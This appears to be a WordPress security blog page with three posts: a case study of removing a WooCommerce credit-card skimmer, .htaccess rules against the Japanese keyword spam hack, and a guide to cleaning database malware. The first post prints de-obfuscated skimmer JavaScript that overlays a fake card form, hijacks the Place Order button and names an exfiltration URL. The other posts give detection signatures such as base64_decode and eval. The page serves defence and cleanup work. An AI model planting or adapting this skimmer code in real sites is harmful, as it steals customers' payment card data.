Category: WordPress Malware

Is your WooCommerce checkout page behaving strangely? Are legitimate orders failing while customers complain about stolen credit card info?

You might be a victim of a Credit Card Skimmer (technically known as a Magecart attack or Payment Gateway Interception). This is one of the most dangerous forms of WordPress malware because it happens on the customer’s browser (Client-Side), meaning your server logs might look completely normal while your customers’ sensitive financial data is being stolen.

In this comprehensive case study, I will walk you through a real-world incident where I detected and removed a sophisticated “Fake Payment Form” malware from a compromised WooCommerce site. I’ll show you the exact symptoms, the malicious code, and the manual removal steps to restore your site’s PCI Compliance.

5 Signs Your WooCommerce Checkout is Hacked

Unlike standard spam hacks, skimmers try to be invisible. However, there are subtle “glitches” that reveal their presence. If you see any of these, stop processing payments immediately:

1. Double Payment Forms: You see two sets of credit card fields or the styling looks slightly “off” (different font or spacing).
2. “Fake” Errors: Customers click “Place Order,” see a loading spinner, and then get a generic error, but no transaction is recorded in Stripe/PayPal.
3. Unknown External Scripts: Your browser’s Network Tab shows requests to strange domains (e.g., api-cdn-store.com, fabulo.xyz) during checkout.
4. Admin Users You Didn’t Create: Check for users named system_admin or wp_updater with Administrator privileges.
5. Sudden Drop in Orders: Traffic is normal, but completed sales have dropped to zero.

Phase 1: Analyzing the “Magecart” JavaScript

I tracked the source of the injection to the WordPress database. The malware wasn’t in a plugin file; it was hidden inside the wp_options table, specifically injected into a custom header script setting used by many themes.

Here is the de-obfuscated code I found. This script utilizes DOM Manipulation to swap the legitimate WooCommerce payment fields with a fraudulent harvesting form.

// 1. Target the Victim
let isChecked = localStorage.getItem("already_checked");
let btnId = "place_order";
let isFrame = true;
let attackerURL = "https://fabulo.xyz/api/accept-car"; // The thief's server

// 2. Inject the Fake Form Overlay
window.addEventListener("load", e => {
  if (document.URL.includes("checkout") && isChecked != "1") {
    setTimeout(() => {
      let frame = document.querySelector(".woocommerce-checkout-payment");
      let newDiv = document.createElement('div');
      newDiv.innerHTML = `
        <div class="fake-payment-form">
          <h3>Secure Payment</h3>
          <input type="text" id="cardNum" placeholder="Card Number">
          <input type="text" id="exp" placeholder="MM/YY">
          <input type="text" id="cvv" placeholder="CVC">
        </div>
      `;
      frame.appendChild(newDiv);
    }, 5000);
  }
});

The “Button Swap” Persistence

The most clever part of this malware was how it handled the submit button. It uses a setInterval loop to constantly check if the real “Place Order” button exists. If found, it destroys it and replaces it with a clone event listener that sends data to the hacker instead of Stripe.

// 3. Swap the Button & Hijack the Click
setInterval(() => {
  let realBtn = document.getElementById("place_order");
  if (realBtn) {
    let fakeBtn = realBtn.cloneNode(true);
    fakeBtn.id = "fake_place_order";
    fakeBtn.addEventListener("click", stealData); // Triggers data exfiltration
    realBtn.remove(); // Deletes the real button
    document.querySelector(".form-row").appendChild(fakeBtn);
  }
}, 2000);

This ensures that even if WooCommerce refreshes the checkout via AJAX (which happens when you change shipping addresses), the malware re-attaches itself instantly.

Phase 2: The Manual Removal Protocol

Because this malware lived in the database, reinstalling WordPress core files or reinstalling plugins would not have fixed it. This is why automated scanners like Wordfence or Sucuri often miss specific database-based skimmers—they primarily scan files.

Step 1: Database Surgery

I used a raw SQL query to locate the specific option containing the payload. In this case, it was hiding in a theme setting for “Header Scripts.”

SELECT * FROM wp_options WHERE option_value LIKE '%fabulo.xyz%';

Once identified, I manually cleaned the option_value to remove the JavaScript while keeping the legitimate header tracking codes (like Google Analytics) intact.

Step 2: Cleaning the Cache (Critical Step)

Skimmers love caching. Even after removing the code from the database, the malicious JavaScript was still being served to visitors from the Redis Object Cache and Cloudflare CDN.

My Cleanup Protocol:

1. Flush WordPress Object Cache (Redis/Memcached) via CLI or Hosting Panel.
2. Purge “Everything” in Cloudflare.
3. Clear Autoptimize/WP Rocket file caches to regenerate minified JS files.

How to Secure WooCommerce Against Skimmers

This attack was likely possible because of a compromised administrator account or an SQL injection vulnerability in an abandoned plugin. To prevent future infections:

• Restrict Admin Access: Use a plugin to limit login attempts and enforce Two-Factor Authentication (2FA) for all shop managers and admins.
• Monitor Header/Footer Scripts: Regularly check your theme’s “Insert Headers and Footers” settings. This is a favorite hiding spot for skimmers.
• Use a Web Application Firewall (WAF): Cloudflare Pro or Wordfence Premium can block the initial SQL injection (SQLi) that allows hackers to write to your database.

FAQ: WooCommerce Malware & Skimmers

Need Urgent Help?

If you suspect your WooCommerce store has a credit card skimmer, shut down your checkout immediately (enable Maintenance Mode) to stop the theft. You are legally liable for customer data loss.

I can manually audit your database, remove the skimmer, and secure your checkout flow today.

👉 Hire Me to Clean Your WooCommerce Site (Fixed Price)

If you check your site on Google and see thousands of weird pages with Japanese characters selling fake products, you have been hit by the Japanese Keyword Hack.

This is a very common virus (also known as the “Japanese SEO Spam”). It creates thousands of fake links on your site to manipulate Google rankings.

Most people try to fix this with a security plugin. But plugins often crash your site because they can’t handle thousands of bots hitting you at once. They run on PHP, which consumes high server resources.

In this guide, I will show you how to block these attacks manually using a Server-Side Firewall. We will do this by editing a file called .htaccess. This blocks the bad bots before they even touch your WordPress installation.

Step 1: Why “410 Gone” is Better Than “404 Not Found”

When you delete a file, your site normally shows a 404 Error.

• 404 means: “I can’t find this page right now. Please check back later.”
• Google thinks: “Okay, maybe it was a mistake. I will keep this link in my database and check again next week.”

This is bad! You want Google to forget these spam links immediately so your SEO recovers.

That is why we use 410 Gone.

• 410 means: “This page is dead. It is removed forever. Do not come back.”
• Google thinks: “Understood. I will delete this from my database immediately.”

By using 410, you clean up your Google search results much faster.

Step 2: Saving Your Server CPU

When a bad bot visits your site, your server normally loads your theme, your logo, your menu, and your footer just to show an error page. This uses a lot of power (CPU).

If 10,000 bots hit you, your server will crash.

We can fix this by forcing the server to show a plain white screen with simple text. Add this to the top of your .htaccess file:

# 1. FORCE SIMPLE TEXT RESPONSE
# This stops your heavy theme from loading for spam bots.
ErrorDocument 410 "<h1>410 Gone</h1><p>Resource permanently removed.</p>"

Now, when we block a bot, it only gets a tiny line of text. Your server stays fast.

Step 3: The “Safe List” (Don’t Lock Yourself Out!)

Before we start blocking things, we must make sure you are safe. We don’t want to accidentally block the Admin area or the Login page.

This code says: “If the user is trying to log in or is an admin, let them pass immediately.”

<IfModule mod_rewrite.c>
RewriteEngine On

# 2. GLOBAL WHITELIST (The Safe List)
# If the URL is for Admin or Login, skip the rest of the rules [L]

RewriteCond %{REQUEST_URI} ^/wp-admin/ [NC,OR]
RewriteCond %{REQUEST_URI} ^/wp-login.php [NC,OR]
RewriteCond %{REQUEST_URI} ^/reset-password/ [NC]
RewriteRule .* - [L]

• [L] means “Last Rule”. It tells the server: “This person is safe. Stop checking and let them in.”

Step 4: Blocking the “Bad Words”

The easiest way to stop spam is to look for obvious bad words in the URL. If a URL contains words like “casino” or “poker,” it is almost certainly spam. We can block these instantly.

# 3. BLOCK PATHS (The Bad Words Filter)
# If the browser asks for any of these words, block it.

RewriteCond %{THE_REQUEST} (casino|gambling|viagra|cialis|poker|baccarat|roulette|jackpot|porn|dating) [NC]
RewriteRule ^(.*)$ - [R=410,L]

• %{THE_REQUEST} checks the raw command the browser sent to the server.
• [R=410] tells the server to send the “410 Gone” error we created in Step 1.

Step 5: Blocking the “Random Number” Trick

This is the smartest part of the virus. The virus often adds random numbers to your URL to make it look unique. It looks like this:

• your-site.com/?a=83748293
• your-site.com/?x=99384721

It uses a single letter (like a or b or x) followed by many numbers. Legitimate plugins rarely do this.

We can use “Regular Expressions” (Regex) to find this pattern and kill it.

# 4. BLOCK QUERY PARAMETERS (The Pattern Killer)
# Pattern: A single letter (a-z) followed by 8 or more digits

RewriteCond %{QUERY_STRING} (^|&)[a-z]=[0-9]{8,} [NC]
RewriteRule ^(.*)$ - [R=410,L]

• [a-z] means “Any letter from a to z”.
• [0-9]{8,} means “Any number that is 8 digits or longer.”
• If a URL matches this pattern, it gets the 410 error instantly.

Step 6: Blocking Fake Folders

Finally, the Japanese spam often tries to create fake folders. Even though these folders don’t exist on your computer, the virus tricks WordPress into showing pages for them. Common fake folders are /jp/ (for Japan) or /products/.

# 5. BLOCK SPAM FOLDERS
# If the URL starts with these folders, block it.

RewriteRule ^products/([0-9]+) - [R=410,L]
RewriteRule ^pages/(.*) - [R=410,L]
RewriteRule ^jp/(.*) - [R=410,L]
RewriteRule ^(.*)\.html$ - [R=410,L]

</IfModule>

Note: The last line (.*)\.html$ blocks any URL ending in .html. Most WordPress sites do not use .html files (they use folders like /about-us/). If your site uses .html, remove that line.

Summary: The Complete Code

This firewall is powerful because it works Server-Side. Bot visits, Apache sees the pattern, serves a 410 error, and WordPress never loads. Your database stays safe and your CPU stays low.

Here is the full code block to copy into your .htaccess file:

# --- START JAPANESE HACK FIREWALL ---
ErrorDocument 410 "<h1>410 Gone</h1><p>Resource permanently removed.</p>"

<IfModule mod_rewrite.c>
RewriteEngine On

# 1. Whitelist Admins
RewriteCond %{REQUEST_URI} ^/wp-admin/ [NC,OR]
RewriteCond %{REQUEST_URI} ^/wp-login.php [NC,OR]
RewriteCond %{REQUEST_URI} ^/reset-password/ [NC]
RewriteRule .* - [L]

# 2. Block Bad Words
RewriteCond %{THE_REQUEST} (casino|gambling|viagra|cialis|poker|baccarat|roulette|jackpot|porn|dating) [NC]
RewriteRule ^(.*)$ - [R=410,L]

# 3. Block Query Patterns (?a=12345678)
RewriteCond %{QUERY_STRING} (^|&)[a-z]=[0-9]{8,} [NC]
RewriteRule ^(.*)$ - [R=410,L]

# 4. Block Spam Folders
RewriteRule ^products/([0-9]+) - [R=410,L]
RewriteRule ^pages/(.*) - [R=410,L]
RewriteRule ^jp/(.*) - [R=410,L]
RewriteRule ^(.*)\.html$ - [R=410,L]

</IfModule>
# --- END FIREWALL ---

Caution: Always backup your .htaccess file before editing it! One wrong character can break your site. If that happens, just restore the backup.

You have scanned your files. You have replaced your core folders. You have deleted the suspicious plugins. Yet, your WordPress site is still redirecting to spam or showing malicious popups.

If this sounds familiar, you likely have database malware.

While most security guides focus on cleaning files (like .php or .js scripts), hackers often inject malicious code directly into your WordPress database to ensure the infection survives even after you delete the bad files.

In this guide, we will show you how to find and remove malicious injections from your database tables like wp_options, wp_posts, and wp_users.

Why Database Malware is So Dangerous

File-based malware is relatively easy to spot—it looks like a strange file in a folder where it doesn’t belong. Database malware is harder to detect because it hides inside legitimate content.

Hackers use the database to:

• Create “Ghost” Admin Accounts: So they can log back in even if you change your password.
• Inject Spam Links: Hiding spam keywords inside thousands of existing posts/pages.
• Trigger Redirects: Modifying the siteurl or home values in wp_options to send your traffic elsewhere.
• Persist Malicious Code: Storing code (like base64_decode) that gets executed when a page loads.

Step 0: BACK UP YOUR DATABASE

Warning: This is the most critical step. Unlike editing a file, there is no “Undo” button when you run a SQL command or delete a database row. If you make a mistake, you can break your entire site.

Before proceeding, open phpMyAdmin or use a backup plugin to export a full .sql copy of your database.

Step 1: Find and Remove “Ghost” Admin Users

The first thing a smart hacker does is create a backdoor administrative account. They often name these users support, admin01, or even wp-security to look legitimate.

1. Log in to your hosting control panel and open phpMyAdmin.
2. Select your WordPress database.
3. Click on the wp_users table (your prefix might be different, e.g., wp_xyz_users).
4. Look for suspicious entries:
   • Do you recognize every email address listed?
   • Are there users you didn’t create?
5. Action: If you find an unknown user, delete the row immediately.

Step 2: Check the wp_options Table for Redirects

The wp_options table contains critical site settings. Hackers love this table because they can inject JavaScript here that loads on every page of your site.

1. In phpMyAdmin, click on the wp_options table.
2. Check the “siteurl” and “home” rows: Ensure these URLs match your actual website domain. If they point to a strange domain, your site is being hijacked.
3. Search for suspicious autoload data: Hackers often hide malicious code in the option_value column for rows that are set to autoload=yes.
4. Action: You can run a SQL search to find suspicious scripts (see Step 3 below).

Step 3: Run SQL Queries to Find Malicious Code

You cannot manually read every single row in your database. Instead, use the Search tab in phpMyAdmin to find common malware signatures.

Here are the most common terms to search for inside your database:

• base64_decode (Often used to hide malicious PHP execution)
• eval( (Used to execute PHP code)
• <script> (Used for JavaScript redirects)
• iframe (Used to load external spam content)
• display:none (Used to hide spam links from humans while showing them to Google)

How to Search:

1. Click the Search tab in phpMyAdmin.
2. Words or values to search for: Enter one of the terms above (e.g., <script>).
3. Inside tables: Select “Select all” to search the whole database.
4. Go: Review the results.

Note: Be careful! Legitimate plugins also use base64_decode or <script>. Context is key. If you see a script tag linking to a Russian (.ru) or unknown domain inside your wp_posts table, it is likely malware. If you see it inside a legitimate plugin’s settings, it might be safe.

Step 4: Clean the wp_posts Table (Spam Injections)

If your site has the “Japanese Keyword Hack” or “Pharma Hack,” the spam content is usually stored in the wp_posts table. Hackers inject spam links into thousands of your existing posts.

To see if you are infected, you can run this SQL query in the SQL tab:

SELECT * FROM wp_posts WHERE post_content LIKE '%<script src=%';

If this returns hundreds of posts containing strange JavaScript sources you didn’t add, your posts have been compromised.

The Fix:

For massive infections (e.g., 5,000 infected posts), manual editing is impossible. You may need to use a “Search and Replace” query to strip the specific malicious string.

Recommendation: Use a plugin like Better Search Replace to safely find the malicious string and replace it with nothing (empty). Always test this on a backup first.

Summary: Don’t Forget the Database

Cleaning the files is only half the battle. If you leave a “Ghost Admin” in wp_users or a redirect script in wp_options, the hackers will walk right back in.

Your Cleanup Checklist:

• [ ] Backup the database.
• [ ] Delete unknown users from wp_users.
• [ ] Verify siteurl and home in wp_options.
• [ ] Search for base64, eval, and <script> tags.
• [ ] Change your database password after cleaning.